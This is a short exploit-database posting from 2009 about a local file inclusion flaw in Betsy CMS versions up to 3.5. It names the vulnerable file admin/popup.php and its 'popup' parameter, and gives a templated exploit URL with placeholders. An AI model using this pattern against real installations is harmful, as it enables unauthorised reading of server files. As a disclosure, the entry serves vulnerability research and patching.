Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability

2009-11-21T00:00:00
ID 1337DAY-ID-10005
Type zdt
Reporter MizoZ
Modified 2009-11-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
============================================================

/*
 
Author          : MizoZ [from MA]
Group           : EvilWay 
 
Good luck DZ :)
 
*/
 
The vulnerability is in the file admin/popup.php on the get $_GET['popup']
 
Exploit :
 
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]


#  0day.today [2018-03-20]  #